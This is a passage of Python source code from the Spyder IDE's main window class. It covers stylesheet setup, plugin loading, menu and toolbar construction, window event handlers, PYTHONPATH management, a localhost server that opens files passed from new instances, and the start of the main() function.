qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
registry_internal_plugins = {}
registry_external_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
if plugin_name in internal_plugins:
registry_internal_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
else:
registry_external_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
PLUGIN_REGISTRY.set_all_internal_plugins(registry_internal_plugins)
PLUGIN_REGISTRY.set_all_external_plugins(registry_external_plugins)
# Instantiate internal Spyder 5 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPluginV2):
PLUGIN_REGISTRY.register_plugin(self, PluginClass,
external=False)
# Instantiate internal Spyder 4 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPlugin):
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
self.preferences.register_plugin_preferences(
plugin_instance)
# Instantiate external Spyder 5 plugins
for plugin_name in external_plugins:
if plugin_name in enabled_plugins:
PluginClass = external_plugins[plugin_name]
try:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=True)
except Exception as error:
print("%s: %s" % (PluginClass, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = PLUGIN_REGISTRY.register_plugin(self, mod,
external=True)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if not hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.thirdparty_plugins.append(plugin)
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.plugins.mainmenu.api import (
ApplicationMenus, ToolsMenuSections, FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut,
id_='file_switcher')
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut,
id_='symbol_finder')
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None]
if self.get_plugin(Plugins.Editor, error=False):
self.edit_menu_actions += self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
id_='spyder_path_action')
from spyder.plugins.application.container import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = ApplicationActions.SpyderWindowsEnvVariables
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action,
before_section=ToolsMenuSections.External
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
        # Mapping of new plugin identifiers vs old attribute
        # names given for plugins
try:
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(
self._INTERNAL_PLUGINS_MAPPING[attr], error=False)
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_name in PLUGIN_REGISTRY:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
# Tabify external plugins which were installed after Spyder was
# installed.
# Note: This is only necessary the first time a plugin is loaded.
        # Afterwards, the plugin placement is recorded on the window hexstate,
# which is loaded by the layouts plugin during the next session.
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if plugin_instance.get_conf('first_time', True):
self.tabify_plugin(plugin_instance, Plugins.Console)
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin_name, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""
Actions to be performed only after the main window's `show` method
is triggered.
"""
# Required plugins
help_plugin = self.get_plugin(Plugins.Help, error=False)
ipyconsole = self.get_plugin(Plugins.IPythonConsole, error=False)
projects = self.get_plugin(Plugins.Projects, error=False)
editor = self.get_plugin(Plugins.Editor, error=False)
console = self.get_plugin(Plugins.Console, error=False)
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# Call on_mainwindow_visible for all plugins.
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin.on_mainwindow_visible()
QApplication.processEvents()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
            t.daemon = True
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if console and console.dockwidget.isVisible() and DEV is None:
console.toggle_view_action.setChecked(False)
console.dockwidget.hide()
# Show Help and IPython console by default
plugins_to_show = []
if help_plugin:
plugins_to_show.append(help_plugin)
if ipyconsole:
plugins_to_show.append(ipyconsole)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Load project, if any.
# TODO: Remove this reference to projects once we can send the command
# line options to the plugins.
if self.open_project:
if not running_in_mac_app():
if projects:
projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
if projects:
projects.reopen_last_project()
# If no project is active, load last session
if projects and projects.get_active_project() is None:
if editor:
editor.setup_open_files(close_previous_files=False)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# To avoid regressions. We shouldn't have loaded the modules
# below at this point.
if DEV is not None:
assert 'pandas' not in sys.modules
assert 'matplotlib' not in sys.modules
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
projects = self.get_plugin(Plugins.Projects, error=False)
if projects:
path = projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
shortcuts = self.get_plugin(Plugins.Shortcuts, error=False)
if shortcuts:
shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
editor = self.get_plugin(Plugins.Editor, error=False)
if editor:
editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
if hasattr(self, 'editor'):
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
        self.undo_action.setEnabled(
            readwrite_editor and widget.document().isUndoAvailable())
        self.redo_action.setEnabled(
            readwrite_editor and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.get_plugin(Plugins.Editor, error=False):
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if hasattr(self, 'layouts'):
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False, close_immediately=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
can_close = PLUGIN_REGISTRY.delete_all_plugins(
excluding={Plugins.Layout}, close_immediately=close_immediately)
if not can_close and not close_immediately:
return False
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
PLUGIN_REGISTRY.delete_plugin(Plugins.Layout)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
console = self.get_plugin(Plugins.Console, error=False)
if console:
if state:
console.redirect_stds()
else:
console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
editor = self.get_plugin(Plugins.Editor, error=False)
variableexplorer = self.get_plugin(
Plugins.VariableExplorer, error=False)
if encoding.is_text_file(fname):
if editor:
editor.load(fname)
elif variableexplorer is not None and ext in IMPORT_EXT:
variableexplorer.get_widget().import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
projects = self.get_plugin(Plugins.Projects, error=False)
read_only_path = ()
if projects:
read_only_path = tuple(projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
projects = self.get_plugin(Plugins.Projects, error=False)
self.project_path = ()
if projects:
self.project_path = tuple(projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:  # Accept connections until the server socket is closed
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False, close_immediately=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(
reset=reset, close_immediately=close_immediately)
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
        # Probably toolbars should be taken into account for this 'delta'
        # only when they are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(MainWindow, app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
